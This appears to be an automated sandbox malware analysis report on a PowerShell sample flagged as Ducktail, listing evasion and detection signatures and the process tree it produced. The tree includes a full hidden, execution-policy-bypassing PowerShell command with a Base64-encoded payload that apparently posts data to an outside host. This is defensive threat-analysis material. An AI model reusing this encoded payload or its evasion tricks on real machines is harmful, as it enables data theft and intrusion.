Edit tour
Windows
Analysis Report
kingsmaker_6.ca.ps1
Overview
General Information
Detection
Ducktail
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Ducktail
AI detected suspicious sample
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Potential dropper URLs found in powershell memory
Powershell drops PE file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: PowerShell Base64 Encoded WMI Classes
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- powershell.exe (PID: 7728 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noLogo -E xecutionPo licy unres tricted -f ile "C:\Us ers\user\D esktop\kin gsmaker_6. ca.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7736 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - csc.exe (PID: 7956 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\plizas uj\plizasu j.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66) - cvtres.exe (PID: 7972 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES9F33.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\pli zasuj\CSCC BC46C10AB9 F47138B837 8156B25D45 5.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - powershell.exe (PID: 7256 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Version 5 .1 -s -NoL ogo -NoPro file MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7280 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Acrobat.exe (PID: 1928 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ Company Bo oklet.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 6792 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 4676 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=20 88 --field -trial-han dle=1640,i ,382761378 8604164973 ,165703240 6073739503 6,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - cmd.exe (PID: 3032 cmdline:
"C:\Window s\system32 \cmd.exe" /c start / min "" pow ershell.ex e -WindowS tyle hidde n -NoLogo -NoProfile -Executio nPolicy by pass -Enco dedCommand JAB1AHIAa QAgAD0AIAA iAGgAdAB0A HAAcwA6AC8 ALwBrAGkAb gBnAHMAbQB hAGsAZQByA C4AYwBhAC8 AZgBpAGwAZ QAyAC8AOQB hAGUAYQA4A GIAZgA4ADM AMwBjADgAN wA3ADAAOQA 1ADkAZABiA DcAYwA3ADI AOABmADQAY wBjAGQAYwB mAGMAOABmA DQAZQA5ADM AMABhAGYAN ABkAGQANAA 0AGUANgA1A DIAMQAzAGI AOQBiADQAY QA0ADcAOAB lADUAZgA4A DYAZABjADE AMQA5AGEAM AA4ADEAMAA xADkANABhA DkAMAA4ADc ANAA0ADAAY gA3ADkAMAA zADgAMgBlA GIANwAxADE ANQBhADkAZ AA2AGEAMwA zAGIAYwAwA DIAMAAyADg AZQA1ADUAN gA3ADgAYQB iAGUAMAAyA GEAZAA0ADU AZAA0ADgAZ QA5AGEAZgB hADkAMwBhA GYAOAAzADc ANQAzADEAZ QAzADUAYgA xAGMAOAA4A GUANgBiAGY AYwBhAGYAY QAyADcAZAA 4ADIAZQBlA DIANAA0ADI AMAAzAGIAO AA2AGEANgA 1ADAAYQBjA GYAMwAzADQ ANgAwADYAN wA2AGUAMQA 5AGUANABkA DUAMABjAGM AYgBmADcAY gA3ADkANQA 1ADcANQBiA DQAOAAxAGU AYwA0AGQAN AAzACIAOwA NAAoAJABjA G8AdQBuAHQ AIAA9ACAAM QAwADAAOwA NAAoADQAKA A0ACgANAAo AZgB1AG4AY wB0AGkAbwB uACAAUwBlA G4AZAAgAHs ADQAKACAAI AAgACAAcAB hAHIAYQBtA CgAIABbAFA AUwBPAGIAa gBlAGMAdAB dACAAJABsA G8AZwBNAHM AZwAgACkAD QAKAA0ACgA gACAAIAAgA CMAIABDAG8 AbgB2AGUAc gB0ACAAYgB vAGQAeQAgA HQAbwAgAHM AdAByAGkAb gBnAA0ACgA gACAAIAAgA CQAcwB0AHI AaQBuAGcAQ gBvAGQAeQA gAD0AIABbA HMAdAByAGk AbgBnAF0AK AAkAGwAbwB nAE0AcwBnA CAAfAAgAEM AbwBuAHYAZ QByAHQAVAB vAC0ASgBzA G8AbgApADs ADQAKACAAI AAgACAAJAB sAG8AZwBNA GUAcwBzAGE AZwBlAHMAI AA9ACAAQAA oACkAOwANA AoAIAAgACA AIAAkAGwAb wBnAE0AZQB zAHMAYQBnA GUAcwAgACs APQAgACQAc wB0AHIAaQB uAGcAQgBvA GQAeQA7AA0 ACgAgACAAI AAgACQAbAB vAGcATQBlA HMAcwBhAGc AZQBzACAAK wA9ACAAIgA tAC0ALQAtA C0ALQAtAC0 ALQAtACIAO wANAAoADQA KACAAIAAgA CAAJABoAGU AYQBkAGUAc gBzACAAPQA gAEAAewB9A DsADQAKACA AIAAgACAAJ ABrAGUAeQA gAD0AIAAiA EMAbwBuAHQ AZQBuAHQAL QBUAHkAcAB lACIAOwANA AoAIAAgACA AIAAkAHYAY QBsAHUAZQA gAD0AIAAiA GEAcABwAGw AaQBjAGEAd ABpAG8AbgA vAGoAcwBvA G4AIgA7AA0 ACgANAAoAI AAgACAAIAA kAGgAZQBhA GQAZQByAHM AWwAkAGsAZ QB5AF0AIAA 9ACAAJAB2A GEAbAB1AGU AOwANAAoAI AAgACAAIAA kAHUAcgBpA CAAPQAgACI ATABPAEcAV QBSAEwAIgA 7AA0ACgAgA CAAIAAgAHQ AcgB5AA0AC gAgACAAIAA gACAAIAAgA CAAewANAAo AIAAgACAAI AAgACAAIAA gACAAIAAgA CAAJABiAG8 AZAB5ACAAP QAgACQAbAB vAGcATQBlA HMAcwBhAGc AZQBzACAAf AAgAEMAbwB uAHYAZQByA HQAVABvAC0 ASgBzAG8Ab gA7AA0ACgA gACAAIAAgA CAAIAAgACA AIAAgACAAI ABJAG4AdgB vAGsAZQAtA FcAZQBiAFI AZQBxAHUAZ QBzAHQAIAA tAFUAcgBpA CAAJAB1AHI AaQAgAC0AT QBlAHQAaAB vAGQAIABQA G8AcwB0ACA ALQBIAGUAY QBkAGUAcgB zACAAJABoA GUAYQBkAGU AcgBzACAAL QBCAG8AZAB 5ACAAJABiA G8AZAB5AA0 ACgAgACAAI AAgACAAIAA gACAAfQANA AoAIAAgACA AIAAgACAAI AAgAGMAYQB 0AGMAaAB7A A0ACgAgACA AIAAgACAAI AAgACAAIAA gACAAIAANA AoAIAAgACA AIAAgACAAI AAgAH0ADQA KACAAIAAgA CAADQAKAH0 ADQAKAA0AC